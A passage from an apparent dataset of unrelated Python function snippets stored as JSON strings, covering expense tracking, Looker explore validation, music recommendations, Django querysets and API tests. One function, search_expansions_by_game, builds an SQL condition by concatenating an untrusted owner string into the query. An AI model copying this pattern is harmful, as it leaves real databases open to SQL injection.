ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def get_queryset(self):\n #print(\"request\", self.request)\n user = self.request.user\n return Experience.objects.filter(person=user)", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def get_recommendations(artists = tuple(), genres = tuple(), limit = 20, features = True, client = None):\n\n recs = client.recommendations(seed_artists = artists, seed_genres = genres, limit = limit)\n tracks = recs['tracks']\n\n # TODO: need a compose function...\n to_keep = (\n 'album_name', 'artist_name', 'name', 'popularity', 'duration_ms',\n 'explicit', 'id'\n )\n rows = list(map(row_filter(to_keep, False), map(_hoist_track_info, tracks)))\n out = pd.DataFrame(rows)\n\n track_ids = [row['id'] for row in rows]\n if features:\n extra_cols = ['uri', 'type', 'duration_ms', 'analysis_url', 'track_href']\n return out.merge(\n get_track_features(track_ids).drop(columns = extra_cols),\n on = \"id\"\n )\n\n return out", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def related_view_filter():\n pass", "def get_recommendations(self):\n endpoints = '/user/recs'\n return self.get_request(endpoints)", "def test_get_scored_recommendations_post(self):\n pass", "def fetch_from_db(self):\n self._potential_deals = DBApi.get_instance().potential_records\n self._filters = DBApi.get_instance().filters\n # Add markdown for url\n for data in self._potential_deals:\n data[\"url\"] = f\"[Link]({data['url']})\"\n self._potential_deals_cols = self._db_api.get_potential_deal_columns()\n self._years = self._db_api.get_unique_years(self._potential_deals)\n self._make_model = self._db_api.get_all_make_models()\n self._action_options = [\"Action1\", \"Action2\", \"Action3\"]", "def list_extractors(age_limit=None):\n return [ie() for ie in list_extractor_classes(age_limit)]", "def get_queryset(self):\n\n user = get_authentication(self.request)\n queryset = Histories.objects.filter(user=user, is_used=True)\n\n return queryset", "def index( self, trans, **kwd ):\n # Example URL: http://localhost:9009/api/repository_revisions\n repository_metadata_dicts = []\n # Build up an anded clause list of filters.\n clause_list = []\n # Filter by downloadable if received.\n downloadable = kwd.get( 'downloadable', None )\n if downloadable is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.downloadable == util.string_as_bool( downloadable ) )\n # Filter by malicious if received.\n malicious = kwd.get( 'malicious', None )\n if malicious is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.malicious == util.string_as_bool( malicious ) )\n # Filter by tools_functionally_correct if received.\n tools_functionally_correct = kwd.get( 'tools_functionally_correct', None )\n if tools_functionally_correct is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.tools_functionally_correct == util.string_as_bool( tools_functionally_correct ) )\n # Filter by missing_test_components if received.\n missing_test_components = kwd.get( 'missing_test_components', None )\n if missing_test_components is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.missing_test_components == util.string_as_bool( missing_test_components ) )\n # Filter by do_not_test if received.\n do_not_test = kwd.get( 'do_not_test', None )\n if do_not_test is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.do_not_test == util.string_as_bool( do_not_test ) )\n # Filter by includes_tools if received.\n includes_tools = kwd.get( 'includes_tools', None )\n if includes_tools is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.includes_tools == util.string_as_bool( includes_tools ) )\n # Filter by test_install_error if received.\n test_install_error = kwd.get( 'test_install_error', None )\n if test_install_error is not None:\n clause_list.append( trans.model.RepositoryMetadata.table.c.test_install_error == util.string_as_bool( test_install_error ) )\n # Filter by skip_tool_test if received.\n skip_tool_test = kwd.get( 'skip_tool_test', None )\n if skip_tool_test is not None:\n skip_tool_test = util.string_as_bool( skip_tool_test )\n skipped_metadata_ids_subquery = select( [ trans.app.model.SkipToolTest.table.c.repository_metadata_id ] )\n if skip_tool_test:\n clause_list.append( trans.model.RepositoryMetadata.id.in_( skipped_metadata_ids_subquery ) )\n else:\n clause_list.append( not_( trans.model.RepositoryMetadata.id.in_( skipped_metadata_ids_subquery ) ) )\n # Generate and execute the query.\n try:\n query = trans.sa_session.query( trans.app.model.RepositoryMetadata ) \\\n .filter( and_( *clause_list ) ) \\\n .order_by( trans.app.model.RepositoryMetadata.table.c.repository_id ) \\\n .all()\n for repository_metadata in query:\n repository_metadata_dict = repository_metadata.get_api_value( view='collection',\n value_mapper=default_value_mapper( trans, repository_metadata ) )\n repository_metadata_dict[ 'url' ] = web.url_for( controller='repository_revisions',\n action='show',\n id=trans.security.encode_id( repository_metadata.id ) )\n repository_metadata_dicts.append( repository_metadata_dict )\n return repository_metadata_dicts\n except Exception, e:\n message = \"Error in the Tool Shed repository_revisions API in index: \" + str( e )\n log.error( message, exc_info=True )\n trans.response.status = 500\n return message", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def explores(self, explores):\n\n self._explores = explores", "def expense_history(request):\n qs: QuerySet = Expense.objects.by_user(request.user.id)\n file_title: str = \"Latest_150_Expenses\"\n form = ExpenseHistory(request.GET)\n if form.is_valid():\n cd: dict = form.cleaned_data\n target: str = cd[\"target\"]\n user_id = request.user.id\n if target == \"date\":\n qs = Expense.objects.filter(date=cd[\"date1\"], user_id=user_id)\n file_title = f'For_{cd[\"date1\"]}'\n elif target == \"each_month\":\n qs = Expense.objects.filter(date__month=cd[\"month\"], user_id=user_id)\n file_title = f\"Every_{calendar.month_name[cd['month']]}_Month\"\n elif target == \"months\":\n qs = Expense.objects.last_n_months_expense(cd[\"p_months\"], user_id)\n file_title = f\"Last_{cd['p_months']}_months\"\n elif target == \"month\":\n qs = Expense.objects.month_expense(cd[\"month\"], cd[\"year\"], user_id)\n file_title = f'For_{calendar.month_name[cd[\"month\"]]}-{cd[\"year\"]}'\n elif target == \"year\":\n qs = Expense.objects.year_expense(cd[\"year\"], user_id)\n file_title = f\"{cd['year']}\"\n elif target == \"between\":\n qs = Expense.objects.filter(date__gte=cd[\"date1\"], date__lte=cd[\"date2\"],\n user__id=user_id)\n file_title = f'Between_{cd[\"date1\"]}_{cd[\"date2\"]}'\n qs = qs.order_by(\"-date\", \"-id\").values_list(\n \"date\", \"description\", \"category__name\", \"method\", \"app\", \"amount\",\n )\n if not form.is_valid():\n qs = qs[:150]\n qs_list = []\n if qs:\n for q in qs:\n qs_list.append([\n q[0], q[1], q[2], METHOD_DICT[q[3]], APP_DICT.get(q[4], \"Other\"), q[5]\n ])\n file_title = f\"{date.today()}_\" + file_title\n return render(request, \"tracker/history.html\",\n {\"qs\": qs_list, \"file_title\": file_title, \"form\": form})", "def test_view_telescope(self):\n telescope_name = 'super_big_telescope'\n instrument_name = 'awesome_instrument'\n create_exposures(telescope_name, instrument_name, 2012, 6, 1)\n create_exposures(telescope_name, instrument_name, 2013, 7, 1)\n expected_exposures = [\n '<Exposure: %s 2012/06/01 run 1>' % telescope_name,\n '<Exposure: %s 2012/06/01 run 2>' % telescope_name,\n '<Exposure: %s 2013/07/01 run 1>' % telescope_name,\n '<Exposure: %s 2013/07/01 run 2>' % telescope_name,\n ]\n response = self.client.get(reverse(\n 'observations:telescope', args=('super_big_telescope',)))\n self.assertQuerysetEqual(response.context['exposure_list'], \n expected_exposures)", "def filter_(cls, exp):\n rsc_filter = config.get('exp_filter', 'rsc_filter')\n if rsc_filter.lower() == 'all':\n return True\n if rsc_filter.lower() == exp.exp_info['faulty_resource'].lower():\n return True\n return False", "def check_for_exposed(context):\n json_data = context.response.json()\n if \"exploitable_vulnerabilities_count\" in json_data:\n raise Exception(\"Field exploitable_vulnerabilities_count Exposed in\"\n \" Free user result\")\n if \"vendor_package_link\" in json_data:\n raise Exception(\"Field vendor_package_link has been exposed for free user\")", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def _explore(self, explore_iterable):\n if self.v_locked:\n raise pex.ParameterLockedException(\n \"Parameter `%s` is locked!\" % self.v_full_name\n )\n\n if self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is already explored, \"\n \"cannot _explore it further!\" % self._name\n )\n\n if self._data is None:\n raise TypeError(\n \"Your parameter `%s` has no default value, please specify one \"\n \"via `f_set` before exploration. \" % self.v_full_name\n )\n\n data_list = self._data_sanity_checks(explore_iterable)\n\n self._explored_range = data_list\n self._explored = True\n self.f_lock()", "def view_experiment(request,id):\n\texp = Experiment.objects.get(id=id)\n\tpossibly_related = get_related(exp)\n\treturn list_detail.object_detail(request,\n\t\t\t\t\t\t\t\t\tqueryset=Experiment.objects.filter(id=id),\n\t\t\t\t\t\t\t\t\tobject_id=exp.id,\n\t\t\t\t\t\t\t\t\ttemplate_name='experiments/experiment.html',\n\t\t\t\t\t\t\t\t\textra_context= {\"possibly_related\" : possibly_related})", "def explore(self, *args):", "def search_expansions_by_game(owner, title):\n uuid = search_uuid(owner, title)\n if uuid:\n condition = \"owner LIKE \\'%\" + owner + \"%\\' AND basegame_uuid=\\'\" + uuid + \"\\'\"\n result = select_columns(choose_database(\"datadb\"), 'expansions', \"*\", condition=condition)\n if not result: # no expansions\n return None\n return result\n return False", "def sel_exp_query(\n experiment_name,\n model,\n # db_config,\n credentials,\n cluster=False):\n perfs = None\n proc_model_name = '%%/%s' % model\n with allen_db(\n # config=db_config,\n cluster=cluster,\n credentials=credentials) as db_conn:\n perfs = db_conn.get_performance_by_model(\n experiment_name=experiment_name,\n model=proc_model_name)\n return perfs", "def experiment_search(request):\n\texp_types = [e[0] for e in set(Experiment.objects.values_list('type'))]\n\tif request.GET:\n\t\tq = Q(name__startswith=request.GET['name__startswith'])\n\t\tq = q & Q(origdir__icontains=request.GET['origdir__icontains'])\n\t\tif not request.GET['type'] == '':\n\t\t\tq = q & Q(type__exact=request.GET['type'])\n\t\texperiments = Experiment.objects.filter(q)\n\t\treturn list_detail.object_list(request,\n\t\t\t\t\t\t\t\t\t\t paginate_by=20,\n\t\t\t\t\t\t\t\t\t\t queryset=experiments.order_by('name'),\n\t\t\t\t\t\t\t\t\t\t template_name='experiments/experiment_list.html',\n\t\t\t\t\t\t\t\t\t\t extra_context={'user':request.user})\n\telse:\n\t\treturn render_to_response('experiments/experiment_search.html',\n\t\t\t\t\t\t\t\t{'exp_types':exp_types},\n\t\t\t\t\t\t\t\tcontext_instance=RequestContext(request))", "def test_index(populate_malware, authenticated_client):\n names = [malware.name for malware in populate_malware]\n for name in names:\n query_json = {'name': name}\n rv = authenticated_client.post('/api/entities/filter/',\n data=json.dumps(query_json),\n content_type='application/json')\n response = json.loads(rv.data)\n for item in response:\n assert item['id'].startswith('malware--')\n assert len(item['labels']) >= 1", "def _filter_entries_by_url(self, url, har):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n if url in entry[\"request\"][\"url\"]:\r\n matches.append(entry)\r\n return matches", "def expenses(self):\n\n return Expenses.objects.filter(\n house=self.house,\n )", "def _filter_entries_by_response(self, urls, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n if len(har[\"log\"][\"entries\"]) > 1:\r\n for entry in har[\"log\"][\"entries\"]:\r\n for url in urls:\r\n if url in entry[\"request\"][\"url\"]:\r\n tempObject = {}\r\n if entry[\"response\"][\"status\"] == 200 and entry[\"response\"][\"content\"].get(\"text\") and entry[\"response\"][\"content\"][\"text\"] != \"\":\r\n tempObject['url'] = entry[\"request\"][\"url\"]\r\n tempObject['response'] = entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore')\r\n matches.append(tempObject)\r\n return matches", "def request_more_resources():\n logger.info(\"NEED MORE RESOURCES!!!!\")", "def _handle_get(self, request, *args, **kwargs):\n self.URL_VARIABLES = {\n 'vendor_location_id': kwargs.get('vendor_location_id'),\n 'vendor_id': kwargs.get('vendor_id')\n }\n\n results = Meal.objects.prefetch_related('vendor_location__vendor__images', 'images').filter(\n vendor_location__pk=kwargs.get('vendor_location_id'),\n vendor_location__vendor__pk=kwargs.get('vendor_id')).order_by('available_starting')\n\n show_deleted = request.QUERY_PARAMS.get('show_deleted', False)\n\n if show_deleted in ['false', 0, False]:\n results = results.filter(is_deleted=False)\n\n return self.list_results(request, results, MealSerializer, use_cache=True, cache_time=self.CACHE_30_DAYS,\n cache_version=1)", "def test_get_offers(self):\n pass", "def retrieve_offers(search_string):\n return reducer((retrieve_offers_html, parse_offers_html), search_string)", "def recommendations(\n self,\n seed_artists=None,\n seed_genres=None,\n seed_tracks=None,\n limit=20,\n country=\"from_token\",\n filter_manele=True,\n **kwargs,\n ):\n params = dict(limit=limit)\n if seed_artists:\n params[\"seed_artists\"] = \",\".join(map(self._get_artist_id, seed_artists))\n if seed_genres:\n params[\"seed_genres\"] = \",\".join(seed_genres)\n if seed_tracks:\n params[\"seed_tracks\"] = \",\".join(map(self._get_track_id, seed_tracks))\n if country:\n params[\"market\"] = country\n for attribute in list(AudioFeature):\n for prefix in [\"min_\", \"max_\", \"target_\"]:\n param = prefix + attribute.value\n if param in kwargs:\n params[param] = kwargs.pop(param)\n\n if not filter_manele:\n return self._get(API.RECOMMENDATIONS.value, **params, **kwargs)\n\n for _ in range(5):\n result = self._get(API.RECOMMENDATIONS.value, **params, **kwargs)\n tracks = [\n t\n for t in result.tracks\n if not any(\n \"manele\" in (a.genres or []) or a.id in MANELISTI for a in t.artists\n )\n ]\n if tracks:\n result.tracks = tracks\n return result\n return self._get(API.RECOMMENDATIONS.value, **params, **kwargs)", "def get_queryset(self):\n qs = super(RetiresmartzAdviceViewSet, self).get_queryset()\n # Check user object permissions\n user = SupportRequest.target_user(self.request)\n return qs.filter_by_user(user)", "def test_list_referrals_by_desc_object(self):\n user = factories.UserFactory()\n referrals = [\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n object=\"First by alphabetical order\",\n post__users=[user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n object=\"Second by alphabetical order\",\n post__users=[user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n ]\n\n self.setup_elasticsearch()\n response = self.client.get(\n f\"/api/referrallites/?user={user.id}&sort=object.keyword&sort_dir=desc\",\n HTTP_AUTHORIZATION=f\"Token {Token.objects.get_or_create(user=user)[0]}\",\n )\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"count\"], 2)\n self.assertEqual(response.json()[\"results\"][0][\"id\"], referrals[1].id)\n self.assertEqual(response.json()[\"results\"][1][\"id\"], referrals[0].id)", "def test_get_with_filter_person(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?size=100&p=P00022\")\n assert r.status_code == 200\n assert len(r.json[\"statements\"]) == 6", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_explore_get_list_only_published(self):\n story1 = create_story(title=\"Test Story\", summary=\"Test Summary\",\n byline=\"Test Byline\", status='published')\n \n story2 = create_story(title=\"Test Story 2\", summary=\"Test Summary 2\",\n byline=\"Test Byline 2\", status='draft')\n resp = self.api_client.get('/api/0.1/stories/explore/')\n self.assertValidJSONResponse(resp)\n self.assertEqual(len(self.deserialize(resp)['objects']), 1)\n self.assertEqual(self.deserialize(resp)['objects'][0]['story_id'], story1.story_id)", "def list(self,request,*args,**kwargs):\n response=super(ListAPIView,self).list(request,*args,**kwargs)\n #add applied_filters to the response which is set when filter_queryset method is called\n response=self.addAppliedFilters(response)\n #fetch data from the related views\n return self.fetch_related(request,response,*args,**kwargs)", "def get_queryset(self):\n reviews = Review.objects \\\n .filter(reviewer=self.request.user) \\\n .filter(closed_on=None) \\\n .order_by('due_date') \\\n .select_related()\n\n reviews = self.step_filter(reviews)\n\n self.search_form = self.get_search_form(reviews)\n reviews = self.search_form.filter_reviews()\n\n return reviews", "def query(url):", "def test_get_with_filter_factoid(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?size=100&f=F00062\")\n assert r.status_code == 200\n assert len(r.json[\"statements\"]) == 3", "def get(self, request, *args, **kwargs):\n return super(PopularSongsView, self).get(request, query=app.MOST_POPULAR_SONGS, *args, **kwargs)", "def get_overview(entities=None):\n \n url = \"{ep}/views/overview\".format(ep=endpoint)\n \n if entities is not None:\n qs = {}\n for e in entities:\n qs.update({'entityId': e})\n \n r = requests.get(url, headers=headers, params=qs)\n else:\n r = requests.get(url, headers=headers)\n \n return r.json()", "def obj_get_list(self, request=None, **kwargs):\n filters = {}\n if hasattr(request, 'GET'):\n # Grab a mutable copy.\n filters = request.GET.copy()\n\n # Update with the provided kwargs.\n filters.update(kwargs)\n if \"community\" in filters:\n try:\n community = Community.objects.get(\n uuid=uuid_from_uri(filters['community']))\n im = community.image_set.filter(is_active=True)\n wb = community.wordbox_set.filter(is_active=True)\n base_object_list = sorted(chain(im, wb),\n key=attrgetter('created_time'))[::-1]\n return self.apply_authorization_limits(request,\n base_object_list)\n except ValueError:\n raise BadRequest(\"Invalid resource lookup data provided \"\n \"(mismatched type).\")\n else:\n raise BadRequest(\"Invalid filtering parameter\")", "def test_and_filtros(self): \n response = self.client.get('/apirest/expedientes/?tipo=PROYECTO&firm_persona_fisica_id=1566')\n self.assertEqual(response.data[\"count\"],self.CANT_EXPEDIENTES_X_FIRMANTE)\n self.assertEqual(response.data[\"results\"][0][\"tipo\"], self.TIPO_PROYECTO)\n self.assertEqual(response.data[\"results\"][0][\"periodo\"], self.PERIODO)", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def _explore(self, iterable):\n raise NotImplementedError(\"Should have implemented this.\")", "def get_queryset(self):\n return ArticleRating.objects.filter(article=self.get_object())", "def get(self) -> list:\n return self.__expedition", "def test_export_data_multiple_explorations(self) -> None:\n # Add two more explorations.\n user_models.ExplorationUserDataModel(\n id='%s.%s' % (self.USER_1_ID, self.EXP_ID_THREE),\n user_id=self.USER_1_ID,\n exploration_id=self.EXP_ID_THREE, rating=5,\n rated_on=self.DATETIME_OBJECT,\n draft_change_list={'new_content': {'content': 3}},\n draft_change_list_last_updated=self.DATETIME_OBJECT,\n draft_change_list_exp_version=2,\n draft_change_list_id=2,\n furthest_reached_checkpoint_exp_version=1,\n furthest_reached_checkpoint_state_name='checkpoint3',\n most_recently_reached_checkpoint_exp_version=1,\n most_recently_reached_checkpoint_state_name='checkpoint2').put()\n\n user_data = user_models.ExplorationUserDataModel.export_data(\n self.USER_1_ID)\n\n expected_data = {\n self.EXP_ID_ONE: {\n 'rating': 2,\n 'rated_on_msec': self.DATETIME_EPOCH,\n 'draft_change_list': {'new_content': {}},\n 'draft_change_list_last_updated_msec': self.DATETIME_EPOCH,\n 'draft_change_list_exp_version': 3,\n 'draft_change_list_id': 1,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': 1,\n 'furthest_reached_checkpoint_state_name': 'checkpoint1',\n 'most_recently_reached_checkpoint_exp_version': 1,\n 'most_recently_reached_checkpoint_state_name': 'checkpoint1'\n },\n self.EXP_ID_TWO: {\n 'rating': None,\n 'rated_on_msec': None,\n 'draft_change_list': None,\n 'draft_change_list_last_updated_msec': None,\n 'draft_change_list_exp_version': None,\n 'draft_change_list_id': 0,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': None,\n 'furthest_reached_checkpoint_state_name': None,\n 'most_recently_reached_checkpoint_exp_version': None,\n 'most_recently_reached_checkpoint_state_name': None\n },\n self.EXP_ID_THREE: {\n 'rating': 5,\n 'rated_on_msec': self.DATETIME_EPOCH,\n 'draft_change_list': {'new_content': {'content': 3}},\n 'draft_change_list_last_updated_msec': self.DATETIME_EPOCH,\n 'draft_change_list_exp_version': 2,\n 'draft_change_list_id': 2,\n 'mute_suggestion_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'mute_feedback_notifications': (\n feconf.DEFAULT_SUGGESTION_NOTIFICATIONS_MUTED_PREFERENCE),\n 'furthest_reached_checkpoint_exp_version': 1,\n 'furthest_reached_checkpoint_state_name': 'checkpoint3',\n 'most_recently_reached_checkpoint_exp_version': 1,\n 'most_recently_reached_checkpoint_state_name': 'checkpoint2'\n }\n }\n self.assertDictEqual(expected_data, user_data)", "def exp_learnedPredicates(self, **kwargs):\n\n entries={}\n for condition in self.exp_predicates.keys():\n text = '%s: %s' % (condition, self.exp_predicates[condition])\n entries[text] = self.readCommandLine\n\n title = \"Ce qu'a appris Baxter pour effectuer le deplacement\" \n self.mm.addGenericMenu(\"expMenu\", self.mm.cur_page, title, entries)\n self.mm.loadMenu(\"expMenu\")", "def test_impact_for_exp_with_no_ratings(self):\n # Sign up a user and have them create an exploration.\n user_a_id = self._sign_up_user(\n self.USER_A_EMAIL, self.USER_A_USERNAME)\n self._create_exploration(self.EXP_ID_1, user_a_id)\n user_stats_model = user_models.UserStatsModel.get(\n user_a_id, strict=False)\n self.assertEqual(user_stats_model, None)", "def exactor_links(self, response: BeautifulSoup):\n raise NotImplementedError", "def find_experiments(model, version, page_index=0):\n\n # We use filter queries instead of regular boolean queries.\n # This is done so that the sort order isn't influenced.\n # We may need to add additional sorting to make a sensible resultset.\n search_query = {\n 'query': {\n 'bool': {\n 'filter': [\n {'term': {'model': model}},\n {'term': {'version': version}}\n ]\n }\n }\n }\n\n results = find_items('experiment', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for item in results['hits']['hits']:\n records.append({\n 'model': item['_source']['model'],\n 'version': item['_source']['version'],\n 'name': item['_source']['experiment'],\n 'date_created': item['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def extract(self, entity, depth=2, page_max=80):\n\n self.logger.info(\"Website : %s\" % entity[\"url\"])\n pages = self.cs.get_crawl_by_url(entity[\"url\"], depth=depth, max_pages=page_max)\n self.logger.info(\"%d pages for crawl of url %s\" % (len(pages), entity[\"url\"]))\n\n entity_report = self._init_entity_report(entity)\n firstpage = True\n\n desc = None\n counter = 0\n for p in pages:\n html = p.content\n relevant_txt = p.relevant_txt\n metas = self.extract_metas(html, relevant_txt, p.url, firstpage, country=entity[\"country\"], lang=p.lang)\n firstpage = False\n\n # Tagcloud\n if relevant_txt is not None:\n entity_report[\"summary\"].add_text(relevant_txt)\n\n # Metas\n for m in metas:\n if metas[m] is not None:\n counter += 1\n\n # -- Special cases initialization --\n if m == \"prices\":\n if len(metas[m]) > 0:\n entity_report[\"ecommerce_meta\"][\"pages_with_prices\"] += 1\n entity_report[\"prices_per_page\"].append(len(metas[m]))\n\n if m in [\"payment_options\", \"delivery_options\"]:\n if len(metas[m]) > 0:\n entity_report[\"ecommerce_meta\"][m].update(metas[m])\n\n if m == \"contact\":\n for cont in metas[m]:\n cont.depth = p.depth\n cont.source = p.url\n\n # -- General cases __\n if m in entity_report.str_attributes:\n entity_report[m] = metas[m]\n elif m in entity_report.social_attributes:\n # For now, meta extractor returns only one social\n # account / page\n entity_report[m][metas[m]] = 0\n elif m in entity_report.list_attributes:\n if type(metas[m]) != list:\n # Manages values returned 'alone' but wen want to aggregate\n metas[m] = [metas[m]]\n for el in metas[m]:\n entity_report[m].append(el)\n elif type(metas[m]) == list:\n for el in metas[m]:\n entity_report[m].add(el)\n else:\n if type(metas[m]) == list or type(metas[m]) == set:\n entity_report[m].update(metas[m])\n else:\n entity_report[m].add(metas[m])\n\n # Checking if seems to be homepage\n if p.url.strip(\" /\") == \"http://\" + p.domain.strip(\" /\"):\n # Checking if seems to be homepage:\n if \"description\" in metas.keys() and metas[\"description\"] is not None:\n desc = metas[\"description\"]\n\n # end for p in pages\n entity_report.normalize(len(pages))\n\n social_accounts = {}\n for social in entity_report.social_attributes:\n social_accounts[social] = self.social_scorer.score(domain=entity_report[\"domain\"],\n social=social,\n accounts=entity_report.get(social, {}))\n\n # Format social fields for insertion in DB\n entity_report[social] = social_accounts[social]\n\n # Metadesc is always the description from the website\n if desc is not None:\n entity_report[\"metadescription\"] = desc\n\n # Get the best account’s description for each social network\n fb_desc = get_best_facebook_account_description(social_accounts.get(\"facebook\"))\n tw_desc = get_best_twitter_account_description(social_accounts.get(\"twitter\"))\n\n # Put all descs we collected in a list\n # We filter out very long descriptions (666 is a serious measure).\n descs = [d for d in (desc, fb_desc, tw_desc) if d is not None and len(d) < 666]\n # When meta desc AND social desc are available, the longest\n # is usually the best one.\n descs = sorted(descs, key=lambda d: len(d), reverse=True)\n desc = None if len(descs) == 0 else descs[0]\n\n if desc is not None:\n entity_report[\"description\"] = desc\n\n # Aggregate extracted outlink domains\n if \"outlinks\" in entity_report.keys():\n agg = {}\n for (domain, count) in entity_report[\"outlinks\"]:\n if domain is not None:\n if domain in agg:\n agg[domain] += 1\n else:\n agg[domain] = 1\n entity_report[\"outlinks\"] = agg\n\n self.logger.info(\"Computed Website [%s] - %d metas extracted\" %\n (entity[\"domain\"], counter))\n\n return entity_report", "def test_list_referrals_by_desc_units_requesters(self):\n user = factories.UserFactory(unit_name=\"a_unite\")\n referrals = [\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n post__users=[factories.UserFactory(unit_name=\"c_unite\"), user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n factories.ReferralFactory(\n state=models.ReferralState.RECEIVED,\n 